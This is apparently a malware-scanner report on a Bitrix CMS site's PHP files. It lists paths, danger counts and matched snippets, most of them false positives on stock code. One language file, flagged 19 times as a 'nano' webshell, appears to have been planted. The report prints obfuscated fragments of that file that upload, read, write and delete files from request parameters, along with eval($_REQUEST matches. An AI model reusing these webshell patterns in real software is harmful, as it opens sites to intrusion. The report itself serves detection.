/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.master_add/lang/en/.description.php Size: 213.00 B Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.master_add/lang/en/wizard.php Size: 1.75 kB Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.master_add/lang/ua/.description.php Size: 316.00 B Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.master_add/lang/ua/wizard.php Size: 2.61 kB Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.master_add/lang/ru/.description.php Size: 330.00 B Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.master_add/lang/ru/wizard.php Size: 2.62 kB Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.master_start/wizard.php Size: 6.91 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.master_start/scripts/drop.php Size: 1.68 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.master_start/scripts/move.php Size: 7.49 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.master_start/lang/en/.description.php Size: 181.00 B Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.master_start/lang/en/wizard.php Size: 1.30 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.master_start/lang/ua/.description.php Size: 221.00 B Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.master_start/lang/ua/wizard.php Size: 1.90 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.master_start/lang/ru/.description.php Size: 221.00 B Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.master_start/lang/ru/wizard.php Size: 1.87 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.slave_start/wizard.php Size: 7.49 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.slave_start/scripts/drop.php Size: 2.31 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.slave_start/scripts/move.php Size: 7.58 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.slave_start/lang/en/.description.php Size: 161.00 B Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.slave_start/lang/en/wizard.php Size: 1.46 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.slave_start/lang/ua/.description.php Size: 201.00 B Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.slave_start/lang/ua/wizard.php Size: 2.11 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.slave_start/lang/ru/.description.php Size: 201.00 B Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.slave_start/lang/ru/wizard.php Size: 2.09 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.slave_add/wizard.php Size: 9.69 kB Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.slave_add/lang/en/.description.php Size: 206.00 B Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.slave_add/lang/en/wizard.php Size: 1.82 kB Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.slave_add/lang/ua/.description.php Size: 309.00 B Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.slave_add/lang/ua/wizard.php Size: 2.72 kB Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.slave_add/lang/ru/.description.php Size: 323.00 B Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.slave_add/lang/ru/wizard.php Size: 2.73 kB Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/wizards/bitrix/cluster.dbnode_add/wizard.php Size: 6.30 kB Created: 2023-03-11 16:42:58 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/admin/cluster_slave_list.php Size: 97.00 B Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/install/admin/cluster_slave_edit.php Size: 97.00 B Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/lang/en/options.php Size: 95.00 B Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/lang/en/classes/mysql/dbnode_check.php Size: 7.13 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/lang/en/admin/menu.php Size: 932.00 B Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/lang/en/admin/cluster_slave_list.php Size: 2.46 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/lang/en/admin/cluster_slave_edit.php Size: 0.99 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/lang/en/admin/cluster_server_list.php Size: 585.00 B Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/lang/ua/options.php Size: 171.00 B Created: 2023-03-11 16:42:56 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/lang/ua/classes/mysql/dbnode_check.php Size: 10.70 kB Created: 2023-03-11 16:42:56 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/lang/ua/admin/menu.php Size: 1.25 kB Created: 2023-03-11 16:42:56 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/lang/ua/admin/cluster_slave_list.php Size: 3.82 kB Created: 2023-03-11 16:42:56 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/lang/ua/admin/cluster_slave_edit.php Size: 1.45 kB Created: 2023-03-11 16:42:56 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/lang/ua/admin/cluster_server_list.php Size: 708.00 B Created: 2023-03-11 16:42:56 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/lang/ru/options.php Size: 175.00 B Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/lang/ru/classes/mysql/dbnode_check.php Size: 10.70 kB Created: 2023-03-11 16:42:56 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/lang/ru/admin/menu.php Size: 1.27 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/lang/ru/admin/cluster_slave_list.php Size: 3.83 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/lang/ru/admin/cluster_slave_edit.php Size: 1.46 kB Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/lang/ru/admin/cluster_server_list.php Size: 712.00 B Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/cluster/default_option.php Size: 68.00 B Created: 2023-03-11 16:42:57 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/im/install/public/desktop_app/file.ajax.php Size: 96.00 B Created: 2023-03-11 16:41:34 Modified: 2023-11-27 14:53:26 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/im/install/public/desktop_app/im.ajax.php Size: 126.00 B Created: 2023-03-11 16:41:34 Modified: 2023-11-27 14:53:26 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/im/install/public/desktop_app/download.file.php Size: 100.00 B Created: 2023-03-11 16:41:34 Modified: 2023-11-27 14:53:26 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/im/install/public/desktop_app/call.ajax.php Size: 96.00 B Created: 2023-03-11 16:41:34 Modified: 2023-11-27 14:53:26 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/im/install/public/desktop_app/call_list.ajax.php Size: 101.00 B Created: 2023-03-11 16:41:34 Modified: 2023-11-27 14:53:26 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/im/install/public/desktop_app/show.file.php Size: 96.00 B Created: 2023-03-11 16:41:34 Modified: 2023-11-27 14:53:26 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/im/install/components/bitrix/im.messenger/im.ajax.php Size: 58.11 kB Created: 2023-03-11 16:41:35 Modified: 2023-11-27 14:53:25 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'if($a["MESSAGE"]["date"] < $b["MESSAGE"]["date"] ) return 1; elseif($a["MESSAGE"]["date"] > $b["MESSAGE"]["date"] ) return -1; else return 0;')); $arResult['COUNTER_UNREAD_MESSAGES'] = $arUnread; } if (!isset($_POST['DISABLE_ONLINE'])) { $arOnline = CIMStatus::GetList(); $arResult['ONLINE'] = !empty($arOnline)? $arOnline['users']: Array(); if (CModule::IncludeModule('pull')) { $arPullConfig = CPullChannel::GetConfig($USER->GetId(), false, false, ($_POST['MOBILE'] == '...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/im/install/components/bitrix/im.messenger/show.file.php Size: 130.00 B Created: 2023-03-11 16:41:34 Modified: 2023-11-27 14:53:25 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/im/install/index.php Size: 14.21 kB Created: 2023-03-11 16:41:34 Modified: 2023-11-27 14:53:25 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/im/ajax_hit.php Size: 289.00 B Created: 2023-03-11 16:41:35 Modified: 2023-11-27 14:53:25 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/subscribe/install/index.php Size: 8.65 kB Created: 2023-03-11 16:38:29 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/bitrix.sitecorporate/install/wizards/bitrix/corp_furniture/scripts/template.php Size: 14.21 kB Created: 2023-03-11 16:38:50 Modified: 2023-11-27 14:53:21 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/bitrix.sitecorporate/install/wizards/bitrix/corp_furniture/scripts/utils.php Size: 12.37 kB Created: 2023-03-11 16:38:50 Modified: 2023-11-27 14:53:21 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'return strcmp($a["SORT"], $b["SORT"]);')); return $arWizardTemplates; } function GetTemplatesPath($path) { $templatesPath = $path."/templates"; if (file_exists($_SERVER["DOCUMENT_ROOT"].$templatesPath."/".LANGUAGE_ID)) $templatesPath .= "/".LANGUAGE_ID; return $templatesPath; } function GetServices($wizardPath, $serviceFolder = "", $arFilter = Array()) { $arServices = Array(); $wizardPath = rtrim($wizardPath, "/"); $serviceFolder = rtrim($serviceFolder, "/"); if (LANGU...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/bitrixcloud/install/examples/bitrixcloud_backup_list_files.php Size: 1.04 kB Created: 2023-03-11 16:43:36 Modified: 2023-11-27 14:53:22 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/bitrixcloud/install/examples/bitrixcloud_backup_read_file.php Size: 3.33 kB Created: 2023-03-11 16:43:36 Modified: 2023-11-27 14:53:22 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/bitrixcloud/lang/en/admin/admin.php Size: 13.79 kB Created: 2023-03-15 04:25:15 Modified: 2023-11-27 14:53:22 Dangers: 19
| Description | Match |
|---|
Exploit nano Line: 102 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$fc[11]($_FILES["f"]["tmp_name"][$i], $n[$i])
| Exploit nano Line: 112 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$fc[17](nhx($_GET["n"])
| Exploit nano Line: 118 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$fc[4]("/(\\\|\/)
| Exploit nano Line: 136 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$fc[5]($scD($p)
| Exploit nano Line: 138 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$fc[6]("$p/$d")
| Exploit nano Line: 139 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$fc[9]("$p/$d")
| Exploit nano Line: 142 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$fc[7]("$p/$f")
| Exploit nano Line: 143 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$fc[10]("$p/$f")
| Exploit nano Line: 146 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$fc[9]("$p/$f")
| Exploit nano Line: 155 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$fc[12]($loc)
| Exploit nano Line: 175 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$fc[12]("$p/{$_POST["n"]}")
| Exploit nano Line: 178 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$fc[13]("$p/{$_POST["n"]}", $_POST["ctn"])
| Exploit nano Line: 181 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$fc[16]($p.'/'.nhx($_GET["n"])
| Exploit nano Line: 184 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$fc[18]($fc[14]($p.'/'.nhx($_GET["n"])
| Exploit nano Line: 185 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$fc[13]($p.'/'.nhx($_GET["n"])
| Exploit nano Line: 30 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$fc[3](nhx($_GET["p"])
| Exploit nano Line: 32 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$fc[2]()
| Exploit nano Line: 87 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$fc[6]($d)
| Exploit nano Line: 97 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$fc[0]()
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/pull/options.php Size: 17.08 kB Created: 2023-03-11 16:39:40 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/pull/classes/general/pull_options.php Size: 13.85 kB Created: 2023-03-11 16:39:41 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/pull/ajax_hit.php Size: 289.00 B Created: 2023-03-11 16:39:40 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/calendar/install/index.php Size: 15.04 kB Created: 2023-03-11 16:40:49 Modified: 2023-11-27 14:53:23 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/forum/classes/general/forum_new.php Size: 88.48 kB Created: 2023-03-11 16:40:54 Modified: 2023-11-27 14:53:24 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function("&\$item", "\$item=intval(\$item);")); $vals = array_unique($vals); $val = implode(",", $vals); } elseif ($type == "double") { array_walk($vals, create_function("&\$item", "\$item=doubleval(\$item);")); $vals = array_unique($vals); $val = implode(",", $vals); } elseif ($type == "datetime") { array_walk($vals, create_function("&\$item", "\$item=\"'\".\$GLOBALS[\"DB\"]->CharToDateFunction(\$GLOBALS[\"DB\"]->ForSql(\$item), \"FULL\").\"'\";")); $vals = array_unique($vals); $val = im...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/forum/mail/mail.php Size: 20.34 kB Created: 2023-03-11 16:40:54 Modified: 2023-11-27 14:53:25 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/forum/include.php Size: 86.22 kB Created: 2023-03-11 16:41:07 Modified: 2023-11-27 14:53:24 Warns: 2
| Description | Match |
|---|
Exploit double_var2 Line: 2473 Warning Double var technique is usually used for the obfuscation of malicious code |
${$sOrderVar}
| Exploit double_var2 Line: 2476 Warning Double var technique is usually used for the obfuscation of malicious code |
${$sOrderVarE}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/forum/install/components/bitrix/forum.topic.list/component.php Size: 23.88 kB Created: 2023-03-11 16:41:05 Modified: 2023-11-27 14:53:24 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 244 Warning Double var technique is usually used for the obfuscation of malicious code |
${$PAGEN_NAME}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/forum/install/components/bitrix/forum.rules/lang/en/component.php Size: 4.71 kB Created: 2023-03-11 16:40:58 Modified: 2023-11-27 14:53:24 Dangers: 1
| Description | Match |
|---|
Sign 407651f7 Line: 27 Dangerous Malware Signature (hash: 407651f7) |
warez
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/forum/install/components/bitrix/forum.topic.active/component.php Size: 18.38 kB Created: 2023-03-11 16:41:06 Modified: 2023-11-27 14:53:24 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 11 Warning Double var technique is usually used for the obfuscation of malicious code |
${$s}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/forum/install/components/bitrix/forum.index/component.php Size: 18.80 kB Created: 2023-03-11 16:40:56 Modified: 2023-11-27 14:53:24 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 111 Warning Double var technique is usually used for the obfuscation of malicious code |
${$PAGEN_NAME}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/eshopapp/install/components/bitrix/eshopapp.basket/component.php Size: 17.03 kB Created: 2023-03-11 16:41:38 Modified: 2023-11-27 14:53:24 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 100 Dangerous Malware Signature (hash: 11413268) |
eVal($_REQUEST
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/eshopapp/install/components/bitrix/eshopapp.basket/templates/.default/template.php Size: 8.36 kB Created: 2023-03-11 16:41:38 Modified: 2023-11-27 14:53:24 Dangers: 4
|
/var/www/allstarsO/allstars.ua/bitrix/modules/eshopapp/install/components/bitrix/eshopapp.order.ajax/templates/mobile/template.php Size: 6.49 kB Created: 2023-03-11 16:41:39 Modified: 2023-11-27 14:53:24 Dangers: 6
|
/var/www/allstarsO/allstars.ua/bitrix/modules/eshopapp/install/components/bitrix/eshopapp.ajax.delivery.calculator/templates/.default/ajax.php Size: 759.00 B Created: 2023-03-11 16:41:39 Modified: 2023-11-27 14:53:24 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 14 Dangerous Malware Signature (hash: 11413268) |
eval($_REQUEST
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/eshopapp/install/templates/eshop_app/components/bitrix/mobileapp.menu/mobile/template.php Size: 14.54 kB Created: 2023-03-11 16:41:36 Modified: 2023-11-27 14:53:24 Warns: 1
| Description | Match |
|---|
Function exec Line: 311 Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec("showAuthForm")
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/eshopapp/install/templates/eshop_app/components/bitrix/sale.ajax.delivery.calculator/mobile/ajax.php Size: 761.00 B Created: 2023-03-11 16:41:36 Modified: 2023-11-27 14:53:24 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 14 Dangerous Malware Signature (hash: 11413268) |
eval($_REQUEST
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/lib/product.php Size: 12.13 kB Created: 2023-03-11 16:37:38 Modified: 2023-11-27 14:53:29 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval( 'function ___dbCastIntToChar($dbtype, $param)'. '{'. ' $result = $param;'. ' if (ToLower($dbtype) === "mssql")'. ' {'. ' $result = "CAST(".$param." AS VARCHAR)";'. ' }'. ' return $result;'. '}' ); } $fieldsMap = array( 'ID' => array( 'data_type' => 'integer', 'primary' => true ), 'TIMESTAMP_X' => array( 'data_type' => 'integer' ), 'DATE_UPDATED' => array( 'data_type' => 'datetime', 'expression' => array( $DB->datetimeToDateFunction('%s'), 'TIMESTAMP_X', ) ), 'QUANTITY' => a...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/lib/discount.php Size: 156.90 kB Created: 2023-03-11 16:37:36 Modified: 2023-11-27 14:53:29 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 2785 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$discount['APPLICATION_EXECUTE']($this->orderData)
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('$checkOrder='.$discountLink[$key].';'); if (!is_callable($checkOrder)) return false; $result = $checkOrder($this->orderData); unset($checkOrder); } else { if (!is_callable($discountLink[$executeKey])) return false; $result = $discountLink[$executeKey]($this->orderData); } unset($discountLink); return $result; } protected function applySaleDiscount() { $result = new Result; Discount\Actions::clearApplyCounter(); $discount = ( isset($this->currentStep['discountIndex']) ? $this->discountsCach...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/lib/delivery/extra_services/manager.php Size: 16.21 kB Created: 2023-03-11 16:37:36 Modified: 2023-11-27 14:53:29 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 247 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$params["CLASS_NAME"]($params["ID"], $params, $currency, $value, $additionalParams)
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/lib/compatible/discountcompatibility.php Size: 45.18 kB Created: 2023-03-11 16:37:38 Modified: 2023-11-27 14:53:29 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('$applyProduct='.$orderApplication.';'); if (is_callable($applyProduct)) $applyProduct($fields); unset($applyProduct); if (!empty($fields['DISCOUNT_RESULT'])) { self::$discountResult['BASKET'][$code][$index]['RESULT']['DESCR_DATA'] = $fields['DISCOUNT_RESULT']['BASKET']; self::$discountResult['BASKET'][$code][$index]['RESULT']['DESCR'] = self::formatDescription($fields['DISCOUNT_RESULT']); } unset($fields['DISCOUNT_RESULT']); } unset($orderApplication); } unset($discount, $index); return tr...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/lib/location/import/compiler/compiler.php Size: 75.72 kB Created: 2023-03-11 16:37:37 Modified: 2023-11-27 14:53:29 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system('cp '.$workDir.self::STATIC_CSV_DIR.'externalservice.csv '.$workDir.'/'.self::OUTPUT_DIR); system('cp '.$workDir.self::STATIC_CSV_DIR.'type.csv '.$workDir.'/'.self::OUTPUT_DIR); } private $currentParentGroup = ''; private function addItemToCSV($fName, $group, $item) { $data = array( 'CODE' => $item['CODE'], 'PARENT_CODE' => $item['PARENT_CODE'], 'TYPE_CODE' => $item['TYPE_CODE'] ); $data['NAME.RU.NAME'] = ''; $data['NAME.EN.NAME'] = ''; $data['NAME.UA.NAME'] = ''; $name = unserialize($ite...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/lib/location/migration/migrate.php Size: 53.98 kB Created: 2023-03-11 16:37:37 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/lib/internals/conversionhandlers.php Size: 13.14 kB Created: 2023-03-11 16:37:37 Modified: 2023-11-27 14:53:29 Warns: 1
| Description | Match |
|---|
Exploit infected_comment Line: 282 Warning Comments composed by 5 random chars usually used to detect if a file is infected yet |
/*array*/
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/lib/internals/product.php Size: 12.18 kB Created: 2023-03-11 16:37:37 Modified: 2023-11-27 14:53:29 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval( 'function ___dbCastIntToChar($dbtype, $param)'. '{'. ' $result = $param;'. ' if (ToLower($dbtype) === "mssql")'. ' {'. ' $result = "CAST(".$param." AS VARCHAR)";'. ' }'. ' return $result;'. '}' ); } $fieldsMap = array( 'ID' => array( 'data_type' => 'integer', 'primary' => true ), 'TIMESTAMP_X' => array( 'data_type' => 'integer' ), 'DATE_UPDATED' => array( 'data_type' => 'datetime', 'expression' => array( $DB->datetimeToDateFunction('%s'), 'TIMESTAMP_X', ) ), 'QUANTITY' => a...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/lib/discount/preset/basepreset.php Size: 22.01 kB Created: 2023-03-11 16:37:38 Modified: 2023-11-27 14:53:29 Warns: 1
| Description | Match |
|---|
